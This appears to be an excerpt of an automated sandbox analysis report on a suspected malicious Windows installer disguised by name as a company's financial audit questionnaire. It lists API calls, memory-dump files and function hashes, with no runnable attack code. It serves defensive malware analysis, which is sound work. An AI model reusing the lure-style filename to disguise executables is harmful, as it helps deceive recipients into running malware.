                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                                                                    • Instruction ID: b46b7f647ddddaa837b295bcbfdf8fe32b4b15f5abab45eff4fbfa9538c7bc71
                                                                                                    • Opcode Fuzzy Hash: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                                                                    • Instruction Fuzzy Hash: E7712371D04228DFEF28CF98C844BADBBB1FB44305F25806AD856BB291C7789A56DF44
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                    • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PointerWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 539440098-0
                                                                                                    • Opcode ID: 5ffa5ab8b8b542d2bf29b319ea7dfd3044dae09937863daa4ca41a6163888e30
                                                                                                    • Instruction ID: ec1369f47cd2415d1f2b24c1eb1a058245e4710fa78a4886d9d776da59196917
                                                                                                    • Opcode Fuzzy Hash: 5ffa5ab8b8b542d2bf29b319ea7dfd3044dae09937863daa4ca41a6163888e30
                                                                                                    • Instruction Fuzzy Hash: B4314831504218EBDF10CF65ED45A9F3FB8EB09755F20807AF904AA1A0D3349E40DBA9
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FC3
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                      • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll), ref: 004052A1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FD4
                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402051
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 334405425-0
                                                                                                    • Opcode ID: a4a7b2ccd0e98f0921e657f91edebe8813d2c583a05dee18c22fa0c78d0b05c4
                                                                                                    • Instruction ID: cb7cdab3b881820b07126fe4dd0a8ef97d4a76ab9142fcea15e567a1f9a0c19a
                                                                                                    • Opcode Fuzzy Hash: a4a7b2ccd0e98f0921e657f91edebe8813d2c583a05dee18c22fa0c78d0b05c4
                                                                                                    • Instruction Fuzzy Hash: FF21C571904215F6CF206FA5CE48ADEBAB4AF04358F70817BF600B51E0D7B98E41DA6E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405BD3: GetFileAttributesW.KERNELBASE(?,?,004057D8,?,?,00000000,004059AE,?,?,?,?), ref: 00405BD8
                                                                                                      • Part of subcall function 00405BD3: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BEC
                                                                                                    • RemoveDirectoryW.KERNEL32(?,?,?,00000000,004059AE), ref: 004057E7
                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000000,004059AE), ref: 004057EF
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405807
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                    • String ID:
                                                                                                    • API String ID: 1655745494-0
                                                                                                    • Opcode ID: 149232c8aad9f1b3775c6dd716a29c2aaafc945b621f2dfd4840630b3c941ba6
                                                                                                    • Instruction ID: bd6d4a3e3c8ae2539ca812546755b4e3e529903dede2fe37ad8455e2da4e9ad8
                                                                                                    • Opcode Fuzzy Hash: 149232c8aad9f1b3775c6dd716a29c2aaafc945b621f2dfd4840630b3c941ba6
                                                                                                    • Instruction Fuzzy Hash: D4E02B3250DA9096C35067349C08B5F3AD8DF86314F14493AFD52F21D0E37855469ABF
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000), ref: 10002963
                                                                                                    • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                    • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                    • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                    • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                    APIs
                                                                                                      • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000305,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nshE0D4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3677997916-0
                                                                                                    • Opcode ID: 6c7d1f518fbb7cdee12c91c7a30429344cb31e91ff0c114b69db44f42e44e333
                                                                                                    • Instruction ID: c5a1559a9846988044f9ea67ad03363f87a10785b4b958f0fd2e75887457cd98
                                                                                                    • Opcode Fuzzy Hash: 6c7d1f518fbb7cdee12c91c7a30429344cb31e91ff0c114b69db44f42e44e333
                                                                                                    • Instruction Fuzzy Hash: BB117371915205EEDF14CFA0C6889AFB7B4EF44359F20843FE042A72D0D7B85A41DB6A
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                    • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                                                                    • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                                                                    • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000305,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 849931509-0
                                                                                                    • Opcode ID: 77255f357ee36c0e17c9fba5f7ad704e0e223fd683348d0f5e4e34767849a248
                                                                                                    • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                                                                    • Opcode Fuzzy Hash: 77255f357ee36c0e17c9fba5f7ad704e0e223fd683348d0f5e4e34767849a248
                                                                                                    • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268545403-0
                                                                                                    • Opcode ID: 4e05bc348ce61fbea98004c31f477e713a946defa61b8302a115f041240983d3
                                                                                                    • Instruction ID: 75f1c009598274424d440b05a3ad8c81c52a8946c909ad9098faf089b9281bcd
                                                                                                    • Opcode Fuzzy Hash: 4e05bc348ce61fbea98004c31f477e713a946defa61b8302a115f041240983d3
                                                                                                    • Instruction Fuzzy Hash: 2DE04FB2B101049BCB64CBA8ED808FEB7A5AB48314B60453FE902B3290C675AC11CF28
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(00000000,00000000,?), ref: 00401DDD
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$EnableShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1136574915-0
                                                                                                    • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                    • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                                                                    • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                                                                    • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,80000000,00000003), ref: 00405BFC
                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesCreate
                                                                                                    • String ID:
                                                                                                    • API String ID: 415043291-0
                                                                                                    • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                    • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                    • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                    • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,004057D8,?,?,00000000,004059AE,?,?,?,?), ref: 00405BD8
                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BEC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                    • Instruction ID: fe29290311b7cb81c7d613108583476726ae082aee9c7ce991490029c956b0b8
                                                                                                    • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                    • Instruction Fuzzy Hash: 04D0C976908020ABC2102B28AE0889BBB65DB542717018B31FA65A22B0C7305C52DAA6
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                      • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
